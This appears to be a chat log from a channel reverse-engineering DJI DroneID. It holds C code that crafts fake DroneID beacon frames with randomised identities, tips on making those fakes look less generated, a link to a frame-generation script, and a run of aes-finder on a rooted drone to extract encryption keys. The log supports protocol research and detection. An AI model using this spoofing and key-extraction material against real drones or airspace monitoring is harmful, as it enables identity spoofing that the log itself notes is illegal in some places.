[2022-04-22 20:25:23] wavesahead : uint8_t beacon_raw[] = { 0x80, 0x00, // 0-1: Frame Control 0x00, 0x00, // 2-3: Duration 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // 4-9: Destination address (broadcast) 0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 10-15: Source address 0xba, 0xde, 0xaf, 0xfe, 0x00, 0x06, // 16-21: BSSID 0x00, 0x00, // 22-23: Sequence / fragment number 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 24-31: Timestamp (GETS OVERWRITTEN TO 0 BY HARDWARE) 0x64, 0x00, // 32-33: Beacon interval 0x00, 0x05, // 34-35: Capability info 0x00, 0x00, /* FILL CONTENT HERE */ // 36-38: SSID parameter set, 0x00:length:content 0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, // supported rates 0x18, 0x24, 0x03, 0x01, 0x0b, // current channel 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, // traffic indication map 0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e, // country information 0x2a, 0x01, 0x00, // erp information 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, // extended supported rates 0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, // HT Capabilities 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3d, 0x16, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, // HT Information 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, // RSN Information 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, // Vendor Specific: Microsoft WMM/WME Paramater Element 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00, };

[2022-04-22 20:35:03] wavesahead : void dji_init_droneinfo_v2(struct enhancedwifi_droneid_v2 *droneinfo, drone_state_t *ds) { memset(droneinfo, 0, sizeof(struct enhancedwifi_droneid_v2)); memcpy(&droneinfo->header, dji_droneinfo_hdr, sizeof(droneinfo->header)); droneinfo->sub_cmd = 0x10; droneinfo->version = 2; droneinfo->state_info[0] = 0xD7; droneinfo->state_info[1] = 0x0F; rand_buf_wcharset((char *) &droneinfo->sn, 14, "ABCDEFGH0123456789", true); droneinfo->latitude = (int32_t) (ds->current_latitude / 10000000 * 57.2957795785523); droneinfo->longitude = (int32_t) (ds->current_longitude / 10000000 * 57.2957795785523); droneinfo->altitude = (int32_t) (ds->current_altitude); droneinfo->absolute_height = 66; droneinfo->vx_north_speed = 40; droneinfo->vy_east_speed = 41; droneinfo->vz_rise_speed = 42; droneinfo->yaw = 7; droneinfo->home_latitude = (int32_t) (ds->home_latitude / 10000000 * 57.2957795785523); droneinfo->home_longitude = (int32_t) (ds->home_longitude / 10000000 * 57.2957795785523); droneinfo->app_gps_latitude = (int32_t) (ds->home_latitude / 10000000 * 57.2957795785523); droneinfo->app_gps_longitude = (int32_t) (ds->home_longitude / 10000000 * 57.2957795785523); droneinfo->product_type = 70; droneinfo->uuid_len = 16; rand_buf_wcharset((char *) &droneinfo->uuid, 16, "ABCDEFGH0123456789", true); }

[2022-04-22 20:35:39] hostile : hah just remembered spoofind droneID in france is illegal. https://twitter.com/d0tslash/status/983682341460697089?s=20&t=ZSqteNgf8A5OoiHZ4Bwftw

[2022-04-22 20:36:38] hostile : re: privacy concerns too , ya all remember this? https://www.youtube.com/watch?v=FqMkIsUmPcI

[2022-04-22 20:39:10] wavesahead : {"seqNum": 18, "status": "1110101111110000", "droneID": "4CG8DCA8GB734", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.3, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "D9H58B5F"} {"seqNum": 18, "status": "1110101111110000", "droneID": "68HD5H97E3709", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 71.0, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "C67G5H1D"} {"seqNum": 18, "status": "1110101111110000", "droneID": "85044312E368B", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.6, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "A7420EE2"} {"seqNum": 18, "status": "1110101111110000", "droneID": "244C8AC18B14A", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.5, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "G9009GFB"} {"seqNum": 18, "status": "1110101111110000", "droneID": "BD7BHC69G9D60", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 70.9, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "ACBBHAC3"} {"seqNum": 18, "status": "1110101111110000", "droneID": "4FGH357ED33B4", "longitude": 0.0, "latitude": 0.0, "absoluteHeight": 66, "altitude": 71.0, "north": 0.4, "east": 0.41, "down": 0.42, "yaw": 0.07, "appGPSTime": 0.0, "appGPSLatitude": 0.0, "appGPSLongitude": 0.0, "homeLongitude": 0.0, "homeLatitude": 0.0, "productType": "Mini SE", "uuid": "2691C82H"}

[2022-04-22 20:39:17] wavesahead : but wireshark:

[2022-04-22 20:40:30] wavesahead :

[2022-04-22 20:41:45] hostile : increment that sequence number and looks good!

[2022-04-22 20:43:13] wavesahead : whcih one?

[2022-04-22 20:43:38] hostile : seqNum": 18,

[2022-04-22 20:43:41] hostile : on all of em

[2022-04-22 20:43:44] wavesahead : uint8_t *craft_droneid_packet(drone_state_t * ds, size_t *pktLen) { size_t pktlen = 0; uint8_t *pkt = NULL; if (ds->droneinfo_ver == 1) { struct enhancedwifi_droneid_v1 *droneid_frame_v1 = NULL; pktlen = sizeof(struct enhancedwifi_droneid_v1); droneid_frame_v1 = malloc(pktlen); if (droneid_frame_v1 == NULL) { ESP_LOGE(TAG, "failed to allocate %u bytes for droneinfo v1 packet", pktlen); return 0; } memset(droneid_frame_v1, 0, pktlen); dji_init_droneinfo_v1(droneid_frame_v1, ds); droneid_frame_v1->seq = ds->current_seq; pkt = (uint8_t *) droneid_frame_v1; } else { struct enhancedwifi_droneid_v2 *droneid_frame_v2 = NULL; pktlen = sizeof(struct enhancedwifi_droneid_v2); droneid_frame_v2 = malloc(pktlen); if (droneid_frame_v2 == NULL) { ESP_LOGE(TAG, "failed to allocate %u bytes for droneinfo v2 packet", pktlen); return 0; } dji_init_droneinfo_v2(droneid_frame_v2, ds); droneid_frame_v2->seq = ds->current_seq; pkt = (uint8_t *) droneid_frame_v2; } *pktLen = pktlen; return pkt; }

[2022-04-22 20:43:48] wavesahead : it is done automatically

[2022-04-22 20:43:59] wavesahead : droneinfo_pkt = craft_droneid_packet(&cfg->drones[i], &droneinfo_pktlen); if (droneinfo_pkt == NULL) continue; cfg->drones[i].current_seq++; if (cfg->drones[i].current_seq > 0xfff) cfg->drones[i].current_seq = 0;

[2022-04-22 20:44:11] hostile : maybe start each one on random sequence

[2022-04-22 20:44:18] hostile : instead of all at same one?

[2022-04-22 20:44:20] wavesahead : no no

[2022-04-22 20:44:55] hostile :

[2022-04-22 20:45:02] hostile : see all droneID and UUID are rando.

[2022-04-22 20:45:08] hostile : but every one is all seqnum 18

[2022-04-22 20:45:11] hostile : sticks out like sore thumb

[2022-04-22 20:54:13] wavesahead : actually thats weird

[2022-04-22 20:54:15] wavesahead : hold on

[2022-04-22 20:55:46] wavesahead : @hostile pay attention

[2022-04-22 20:55:49] wavesahead : they are different stations

[2022-04-22 20:56:07] wavesahead : of course their sequence numbers are the same, although i can offset them

[2022-04-22 20:56:33] hostile : I know they are different stations.

[2022-04-22 20:56:42] wavesahead : two different stations started at the same time will obviously have the same seq, but yes, we can touch that up

[2022-04-22 20:56:43] wavesahead : hold on

[2022-04-22 20:56:45] hostile : I'm staying they stick out as *generated* since all stations are in sequence

[2022-04-22 20:57:28] hostile : rando that product type field too? (or make configurable eventually)

[2022-04-22 21:01:12] wavesahead : im not setting it because something is off with the encoding

[2022-04-22 21:01:26] wavesahead : kismet is acting up, isnt the web ui default now?

[2022-04-22 21:27:59] wavesahead : too sleep deprived now

[2022-04-22 21:28:23] hostile : yes compile kismet from source

[2022-04-22 21:28:29] hostile : don't use from apt or package

[2022-04-22 21:35:45] wavesahead : got git

[2022-04-22 21:35:49] wavesahead : working

[2022-04-22 21:35:53] wavesahead : i think kismet only sees v1

[2022-04-22 21:44:37] dragorn : well like I said before: Find me a v1 and a v2 packet

[2022-04-22 21:44:40] dragorn : because I sure cant' find one

[2022-04-22 21:44:53] dragorn : even old caps that are supposed to be v1 have a v2 in the version field and weird lengths

[2022-04-22 21:45:05] dragorn : I've yet to see a 100% "this is a v1" and "this is a v2"

[2022-04-22 21:45:19] dragorn : kismet git can absolutely parse the new format in that v2 python script

[2022-04-22 21:45:36] dragorn : the problem is every packet i've seen identifies as v2, even when it isn't, and they're all exactly the same length ie tag

[2022-04-22 21:45:39] dragorn : which shouldn't be possible

[2022-04-22 21:45:57] dragorn : so either the data i have is bunk, or dji has absolute garbage firmware. The latter has been 100% true in the past.

[2022-04-22 21:47:42] dragorn : i've been given some pcaps which are supposed to be v2 with v2 content. kismet handles them fine (again, git only)

[2022-04-22 21:47:56] dragorn : but are they really v2? are the "v1" pcaps really v1? no clue..

[2022-04-22 21:48:10] dragorn : I have no drones currently (or any plans to buy them) so that's where things stand for n ow

[2022-04-22 21:50:58] dragorn : (i realize I sound pissed off - i'm not, just a little exasperated with shitty firmware and having no ability to attack any of it directly myself for now)

[2022-04-22 21:54:25] hostile : and TBH we've said somethings 30 times in a row. Chat history MUST be used. We all moving rapidly, but must pay attention

[2022-04-22 22:00:00] dragorn : hey i'm probably guilty of not following too

[2022-04-22 22:00:03] dragorn : to be fair

[2022-04-22 22:00:11] dragorn : it's been a busy few weeks here

[2022-04-22 22:18:39] hostile : dirty rapid prototyping

[2022-04-22 22:37:15] wavesahead : briefly here

[2022-04-22 22:37:43] wavesahead : @dragorn ill provide you with sanitized pcaps and finally write that tool to sanitize them

[2022-04-22 22:38:04] wavesahead : v1 and v2 are different, absolutely. im in the same boat as you re no drones from dji and no interest in buying one

[2022-04-22 22:38:11] wavesahead : at least not now

[2022-04-22 22:39:05] wavesahead : i tried my detection with a nightly and my esp32 prototype, obviously could use some debugging for that component

[2022-04-23 02:32:11] proto : the rf drone id bursts contain 174 bytes of demodulated data, only ~ 91 bytes of which are used for what we call drone id. the rest are seemingly always constant between power ons. anyone have a clue as to what that data is? is it just random garbage from the drone that's padding the burst out? there doesn't seem to be any real pattern to the data. most of the data is just zeros anyway. something like 28-31 bytes of non-zero data in total

[2022-04-23 03:25:19] hostile : crypto key info for the Occusync AES stream?

[2022-04-23 03:56:23] hotelzululima : (waiting with baited breath)

[2022-04-23 03:59:04] proto : would be funny, but i'd be surprised if it were something like that. how long is the key supposed to be?

[2022-04-23 03:59:23] proto : is there any way to test that thought?

[2022-04-23 04:40:24] hostile : ``` All data transmitted through OcuSync 2.0 is encrypted using the leading AES-256 standard, ensuring critical mission information is protected and can only be accessed by authorized parties. ```

[2022-04-23 04:40:28] hostile : https://www.dji.com/newsroom/news/dji-improves-enterprise-drones-and-fleet-management-software-to-enable-next-level-commercial-drone-operations

[2022-04-23 04:43:59] hostile : https://dji-rev.com/dji-rev/pl/8tej7awowfff3kcewis7hjbfpe

[2022-04-23 04:46:55] hostile : https://dji-rev.com/dji-rev/pl/bkjc6r5a9tbfiqak5wtnm1585y

[2022-04-23 04:46:58] hostile : https://dji-rev.com/dji-rev/pl/9nkb6yapt3gbtnq7e7ztifsy6c

[2022-04-23 04:47:22] hostile : @validat0r you still here? You say Occusync uses a PSK?

[2022-04-23 04:49:48] hostile :

[2022-04-23 04:49:59] hostile :

[2022-04-23 04:50:27] proto : oof, that's out of my league O.O

[2022-04-23 04:50:53] hostile : maybe. Shoot for the moon, you may hit that fucker

[2022-04-23 04:50:58] proto : just got done pushing up a MATLAB script that is supposed to generate arbitrary drone id frames. unfortunately it's not quite right for some reason

[2022-04-23 04:51:23] proto : amplitudes of the ofdm symbols are fucky

[2022-04-23 04:52:24] proto : if anyone wants to dork around: https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m

[2022-04-23 04:53:37] proto : had to hate fuck a crc algo into matlab. it did not go willingly

[2022-04-23 05:07:03] hostile : Look everyone thinks AES PSK

[2022-04-23 05:10:49] hostile :

[2022-04-23 05:10:54] hostile : https://www.precisionhawk.com/hubfs/Retest_DJI%20Cybersecurity%20Risk%20Assessment%20Final%20Report_03.31.2020%20Executive%20Summary%20(1).pdf

[2022-04-23 05:11:46] hostile : Hey pretty sure I couldn't talk about that before. I love it when shit becomes public info.

[2022-04-23 05:12:13] proto : all the des

[2022-04-23 05:12:13] proto : all the DES

[2022-04-23 05:17:52] atlantic : 173 bytes + 3 bytes LTE CRC24. The data beyond the DJI CRC16 is garbage because they do not zeroize the buffer. There are two messages: flight record and flight purpose. Flight purpose is longer, so you will see that data (crc etc).

[2022-04-23 05:19:11] hostile : lol so they just leaking chunks of memory in the packet?

[2022-04-23 05:20:14] proto : would be an interesting attack vector O.o

[2022-04-23 05:20:45] hostile : would be hilarious if they leaked parts of the key like that

[2022-04-23 05:21:45] atlantic : just garbage of the other message

[2022-04-23 05:22:28] hostile : assumed as much. but it made me think of heartbleed none the less.

[2022-04-23 05:22:33] atlantic : no random parts of memory

[2022-04-23 05:26:45] atlantic : in the dji go 4 aoo, you can fill in a uuid and flight purpose. type something there, maximum characters, and have a look at your drone id.

[2022-04-23 05:27:25] atlantic : aoo=app

[2022-04-23 05:27:28] proto : oooo, good idea

[2022-04-23 05:27:31] proto : thanks!

[2022-04-23 05:27:56] proto : i'll give that a go after some sleep. currently slamming my head against ofdm modulation issues

[2022-04-23 05:28:22] proto : i've managed to make something so simple infinitely more difficult

[2022-04-23 05:30:30] proto : i'm calling it a night. fingers crossed for successful tx'ing tomorrow :)

[2022-04-23 06:14:25] superlogical : superlogical joined the channel.

[2022-04-23 07:32:25] tmbinc : @proto the remaining bytes is literally the memory content of the SDR :) they don't clear it

[2022-04-23 07:32:36] tmbinc : ah, atlantic already commented

[2022-04-23 13:56:48] ostap : ostap joined the channel.

[2022-04-23 14:03:29] wavesahead : so

[2022-04-23 14:04:04] wavesahead : if someone 1) gets me a loaned drone jailbroken 2) allows me vpn access into a net where i can connect into the drone, i can probs look around for the keying data

[2022-04-23 14:04:18] wavesahead : it should be trivial to detect aes key expansion blocks and extract them from memory

[2022-04-23 14:04:41] wavesahead : re prng: fuck that, we need to know what they are using for rng

[2022-04-23 14:05:15] wavesahead : @atlantic hilarious

[2022-04-23 14:05:31] wavesahead : might still be useful for an exploit if it contains heap ptrs

[2022-04-23 14:07:35] wavesahead : time to use pinned messages you fucks

[2022-04-23 14:07:51] wavesahead : nobody has time to doom scroll

[2022-04-23 14:08:50] wavesahead : a note on AES: what key exchange method is being used?

[2022-04-23 15:26:20] the_lord : is rooted mini 2 good for you?

[2022-04-23 15:27:14] wavesahead : that could work, what fw is it running?

[2022-04-23 15:27:25] wavesahead : mini 2 is enhancedwifi?

[2022-04-23 15:27:35] the_lord : no its ocusync 2

[2022-04-23 15:27:40] wavesahead : sweet then

[2022-04-23 15:30:02] the_lord : re FW , I think its latest version, I don't remember I need to check

[2022-04-23 15:30:11] wavesahead : sweet ^ 2

[2022-04-23 16:07:33] bobboynton : bobboynton joined the channel.

[2022-04-23 17:42:08] wavesahead : @atlantic around?

[2022-04-23 19:35:10] wavesahead : This is modified script that will cloak your coordinates: like so 'XX.X1975390ZZZZZZ'

[2022-04-23 19:35:34] wavesahead : argh

[2022-04-23 19:38:51] wavesahead : Correct script. This will cloak the coordinate fields like so: 802.11 SSID: b'' BSSID 38:d2:62:b2XXXX CHANNEL: 149 { "seqNum": 141, "status": "1100100010111000", "droneID": "THIS IS PRINTED AS IS, NO CLOAKING! (edited to keep someone's drone data off)", "longitude": "XX.X", "latitude": "XX.X", "absoluteHeight": 0, "altitude": 0.0, "north": 0.0, "east": 0.0, "down": 0.0, "yaw": 545.12, "appGPSTime": 1648702488.681, "appGPSLatitude": "XX.X1975390ZZZZZZ", "appGPSLongitude": "XX.X07680628ZZZZZZ", "homeLongitude": "XX.X", "homeLatitude": "XX.X", "productType": "Mini SE", "uuid": "" }

[2022-04-23 19:39:34] wavesahead : so, if you send the dump over PM ill get the real drone id/sn, but nothing else. also the bssid. none of this is really sensitive.

[2022-04-23 20:11:40] hostile : we need a scapy script to import and export a good cap with someones real coords, obfuscated to a new location

[2022-04-23 20:12:12] hostile : takes pcap, filters only ivs... and spits out anonymized location with real drone detail re: roll pitch yaw, etc from their flight path

[2022-04-23 20:12:39] hostile : or a way to *localize* pcaps to a specific regions lat / lon and include same real flight path

[2022-04-23 20:16:21] wavesahead : yeah i can do that in a few

[2022-04-23 20:16:24] wavesahead : btw

[2022-04-23 20:16:53] wavesahead : / # ./tmp/aes-finder Usage: aes-finder -pid | process-name / # uname -a Linux AmbaLink 4.9.76 #1 SMP PREEMPT Mon Nov 30 21:27:09 CST 2020 armv7l GNU/Linux / #

[2022-04-23 20:17:04] wavesahead : inside rooted drone

[2022-04-23 20:17:08] wavesahead : cross compiled aes-finder

[2022-04-23 20:17:17] wavesahead : reports nothing, about to test with RC connected

[2022-04-23 20:17:25] wavesahead : this is thanks to the generosity of someone here

[2022-04-23 20:28:37] wavesahead : /tmp # for i in `ps auxw | awk '{ print $1 }'`; do ./aes-finder $i; done Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! Done! /tmp # for i in `ps auxw | awk '{ print $1 }'`; do ./aes-finder $i; done | less

[2022-04-23 20:28:52] wavesahead : im suspecting this is due to whitebox crypto AND/OR the aes-finder process dumping is shit

[2022-04-23 21:10:22] jan2642 : I’m not at all up-to-date with the current drones but in mavic air e.g. they moved the crypto to a TrustZone applet. In that case aes-finder won’t find the keys in the different processes memory because they themselves don’t have access to it.

[2022-04-23 21:26:38] wavesahead : yep

[2022-04-23 21:28:24] hostile :

[2022-04-23 21:51:51] superlogical : Hi! Trying to get the matlab code going with my recordings but always fails finding the bursts.... anyone got a hint?

[2022-04-23 21:55:53] proto : hmm, your window doesn't appear to have enough data in it. one sec

[2022-04-23 21:58:00] proto : i think that you have a correlation peak that is within `search_window` (`100` samples) of the beginning of the file

[2022-04-23 21:58:55] proto : which likely means you caught the middle of the droneid burst at the very beginning of your collect. this is def a bug that i don't check to make sure that there are enough samples to complete the search

[2022-04-23 22:01:52] hostile : lemme know if I need to send more bottles of expensive champaigne @Proto you've been out doing yourself constantly.

[2022-04-23 22:05:26] proto : @superlogical replace starting at line 70 with the following: ``` % Look through each element of the `passing_scores` vector (which is just indicies where the correlation threshold was % met) and pick just the highest value `search_window` elements around (`search_window/2` to the left and right) of each % value. The goal here is to only end up with the best score for the starting point of each burst instead of having % multiple starting points for each burst. true_peaks = []; search_window = 100; for idx = 1:length(passing_scores) % Calculate how far to the left and right to look for the highest peak left_idx = passing_scores(idx) - (search_window / 2); right_idx = left_idx + search_window - 1; if (left_idx < 0 || right_idx > length(abs_scores)) warning("Had to abandon searching for burst '%d' as it was too close to the end/beginning of the window", idx); continue end % Get the correlation scores for the samples around the current point window = abs_scores(left_idx:right_idx); % Find the peak in the window and use that value as the actual peak [value, index] = max(window); true_peaks = [true_peaks, left_idx + index]; end ```

[2022-04-23 22:05:40] proto : that *might* fix the issue

[2022-04-23 22:06:13] proto : i pushed that code up as well

[2022-04-23 22:08:57] superlogical : currently executing - will report results, but then have to go to sleep.

[2022-04-23 22:08:59] superlogical : Thx

[2022-04-23 22:12:45] dragorn : Did someone say "android exploit"? https://thehackernews.com/2022/04/critical-chipset-bug-opens-millions-of.html :)

[2022-04-23 22:26:13] superlogical :

[2022-04-23 22:26:31] proto : pppoooopppp

[2022-04-23 22:26:34] proto : will check

[2022-04-23 23:03:51] wavesahead : |Manufacturer | DJI| |--- | ---| |Model | Mini SE| |Serial Number | 4AES2700598170| |ID Method | DroneID| |Home Location | 0, 0| |App Location | 0, 0| |TelemetryMotor1Airborne0Last Location0, 0Altitude708Height6 | Motor | 1 | Airborne | 0 | Last Location | 0, 0 | Altitude | 708 | Height | 6| |Motor | 1| |Airborne | 0| |Last Location | 0, 0| |Altitude | 708| |Height | 6|

[2022-04-23 23:03:56] wavesahead : im curious about the state info @dragorn

[2022-04-23 23:05:02] wavesahead : local_state_info = setStateBit(local_state_info, 0x01); // set serial valid local_state_info = setStateBit(local_state_info, 0x02); // set user privacy enabled local_state_info = setStateBit(local_state_info, 0x04); // homepoint set local_state_info = setStateBit(local_state_info, 0x08); // uuid set local_state_info = setStateBit(local_state_info, 0x10); // motor on ... etc

[2022-04-23 23:05:16] wavesahead : so, im curious as to why that isn't coming up

[2022-04-24 02:23:52] ashen : ashen joined the channel.

[2022-04-24 04:48:07] oakley75 : For instance, Snowden de-solders his mic and uses an external, but this shows how nothing is really enough.

[2022-04-24 08:15:17] atlantic : no ?

[2022-04-24 08:25:17] atlantic : what is the working principle of aes-finder? how does it know it is a key and not some random bits?

[2022-04-24 08:31:49] wavesahead : heuristics that apply to aes keys

[2022-04-24 08:32:09] wavesahead : the expansion blocks have long been known to be excellent for accurate memory search

[2022-04-24 08:32:15] wavesahead : goes all the way back to coldboot and co

[2022-04-24 19:53:50] proto : i'm in need of some dsp assistance. when i receive signals sent by the drone i can just create a ZC sequence, take the conjugate of it, and use the values as taps to a fir or fft filter. what i get out is normally a nice normalized 0-1.0 score that works perfectly for plucking the signal out. but, when i look at signals from others the correlation results are all over the place. i was making a blind assumption that the ZC had some kind of special property that made this just magically work. i suspect that was a mistake and i have to normalize on my own which is crazy expensive computationally (i can prob do some tricks to get it much faster with a day or so of work) which isn't as nice as just 'filter this please'. so, is there anything to the ZC being special or am i going to have to do this the hard way?

[2022-04-24 19:55:14] proto : this is the code i use for generating the seq: ``` % Would use MATLAB's zadoffChuSeq function, but Octave doesn't have that % The logic below was tested against the MATLAB function zc = reshape(exp(-1j * pi * root * (0:600) .* (1:601) / 601), [], 1); % Remove the middle value (this would be DC in the FFT) zc(301) = []; % Create a buffer to hold the freq domain carriers samples_freq = zeros(fft_size, 1); % Get which FFT bins should be used for data carriers data_carrier_indices = get_data_carrier_indices(fft_size * 15e3); % Assign just the data carrier bins (left to right) the ZC sequence values samples_freq(data_carrier_indices) = zc; % Convert to time domain making sure to flip the spectrum left to right first samples = ifft(fftshift(samples_freq)); ```

[2022-04-24 20:25:47] atlantic : what do you mean by all over the place?

[2022-04-24 20:26:28] atlantic : uplink als uses ZC u=600, so you also get hits on that one.

[2022-04-24 20:27:53] atlantic : if you have cfo, all u other than 600 and 1 will give multiple peaks. so you have correct cfo first.

[2022-04-24 20:39:38] proto : oh, i mean that the results of filtering (fir or fft) with the conjugate of the zc sequence does give me one very sharp peak, but the amplitude of that peak is not normalized to between 0 and 1.0 (0-100% match). normalized correlation results are really nice for streaming demod since i don't have to figure out what the correlation min value should be based on some random value that might change environment to environment or between sdrs. i have a function that will return a score between 0 and 1.0 (see below) but it's rather expensive as is due to recalculating the mean and variance *every single sample offset* ``` %% Computes the normalized cross correlation of two vectors % Used https://www.researchgate.net/post/How-can-one-calculate-normalized-cross-correlation-between-two-arrays % as the reference for this implementation function [score] = normalized_xcorr(window_one, window_two) assert(length(window_one) == length(window_two), "Windows must be equal length"); assert(isrow(window_one) || iscolumn(window_one), "Windows must be row/column vectors"); assert(isrow(window_two) || iscolumn(window_two), "Windows must be row/column vectors"); % Make both windows zero mean window_one = window_one - mean(window_one); window_two = window_two - mean(window_two); % Cross correlate and get the average xcorr_value = sum(window_one .* conj(window_two)) / length(window_one); % Final step in normalization score = xcorr_value / sqrt(var(window_one) * var(window_two)); end ```

[2022-04-24 20:40:18] proto : and i purposefully did not reverse the zc sequence before loading into the filter coefficients since it's symmetric

[2022-04-24 20:56:21] wavesahead : too tired today to help

[2022-04-25 14:02:14] pinejuice : pinejuice joined the channel.

[2022-04-25 17:20:06] stanlee : https://dronexl.co/2022/04/25/dji-helps-the-russians-ukraine-government/

[2022-04-25 17:43:34] hostile : For posterity... https://dji-rev.com/dji-rev/pl/ckxpma7pib8kzkbeqk1588impa

[2022-04-25 17:58:07] atlantic : this blog owner has no new news, no references, he is just making an new article recycling old "news" with a lot of keywords to generate traffic on this blog.

[2022-04-25 19:56:56] wavesahead : @hostile they are actively barring them from using aeroscope in some cases and refusing to help them in deactivating droneid

[2022-04-25 19:57:06] wavesahead : there is no 'tampering' about those facts

[2022-04-25 19:57:37] wavesahead : maybe when you got your information that was the case

[2022-04-25 19:57:43] wavesahead : but most definitely that is not the situation now

[2022-04-25 20:39:27] hostile : @wavesahead I'm aware of the speculation... some of these are not "facts"

[2022-04-25 20:40:15] hostile : 1) DJI does not support disable of droneID for anyone period. Please show otherwise. For example a Russian successfully asking DJI to disable it, or providing firmware with it disabled. This is simply NOT factually authenticated information period.

[2022-04-25 20:40:55] hostile : "actively barring them from using aeroscope in some cases" show me ONE case... I'll sit and wait. And we can talk to the person who's Aeroscope it is, and I'll rope In Adam Lisberg personally to discuss IF DJI supported them in their request for assistance.

[2022-04-25 20:42:06] hostile : 2) "maybe when you got your information that was the case" since I have got my information, no one has provided a validated, verifiable account of this claim. Period. Feel free to do so yourself. ANYONE here can claim to be in contact with so and so, whos mom is the Ukraininan what ever. NO ONE has provided verified proof. Period.

[2022-04-25 20:42:06] hostile : 2) "maybe when you got your information that was the case" since I have got my information, no one has provided a validated, verifiable account of this claim. Period. Feel free to do so yourself. ANYONE here can claim to be in contact with so and so, whos mom is the Ukrainian what ever. NO ONE has provided verified proof. Period.

[2022-04-25 20:42:54] hostile : anyone is welcome to make statements. Just like I have always done' i will continue to push folks to prove their statements, and not expect anyone to take them as face value.

[2022-04-25 20:44:06] hostile : Simple example. My penis is 13 inches long, and the Ukrainian defense minister personally verified that it is so large it requires it's own no fly zone. This is a fact, simply because I said it. No one can prove otherwise.

[2022-04-25 20:45:53] hostile : I welcome ANYONE to refute this claim, and I'll personally reach out to Adam and we will get the unit trouble shooted together.

[2022-04-25 20:45:53] hostile : I welcome ANYONE to refute this claim below in Adam / my tweet exchange, and I'll personally reach out to Adam and we will get the unit trouble shooted together.

[2022-04-25 20:45:58] hostile : https://twitter.com/adamlisberg/status/1501994676018200583

[2022-04-25 20:46:53] hostile :

[2022-04-25 20:47:36] hostile : Also please be aware of some of the inital source was from a disgruntled DJI dealer claiming to be "blackmailed" by DJI over some hardware order support. https://www.facebook.com/story.php?story_fbid=5293125594071761&id=100001231196056

[2022-04-25 20:47:54] hostile :

[2022-04-25 20:49:21] hostile : https://www.facebook.com/taras.troiak/posts/5305016822882638

[2022-04-25 20:49:46] hostile :

[2022-04-25 20:49:55] hostile :

[2022-04-25 20:50:46] hostile : so again... anyone here that knows folks on the ground making the claim that DJI is refusing to help them with an Aeroscope unit that is broken. Reach out to me personally, and we will talk to Adam about it and put it to rest. Else stop repeating unverified information please.

[2022-04-25 20:51:36] hostile : if you do wanna repeat it... provide some forensic evidence that DJI is preventing access, as opposed to a dumb operator that didn't update an SSL cert, OR a network taht was compromised by Russian's (altering the SSL)

[2022-04-25 20:52:08] hostile : per:

[2022-04-25 20:52:23] hostile : ''Dear Aeroscope owner: The certificate and key files for the Aeroscope unit #aeroscopeID# will be expired in one week. Please update them in time. Please contact with your DJI sales manager or DJI dealer to handle this update. DJI will issue the new certificate file and key file if the annual maintain fee is paid. Public cloud server will automatically upload these issued files. After that you could update those to the unit remotely. Please send your question to aeroscope.support@dji.com if you have any for this certificate update. Thanks Aeroscope product team"

[2022-04-25 20:55:11] hostile : so you leave your shit up... power goes out cuz of mortar... on reboot you get :

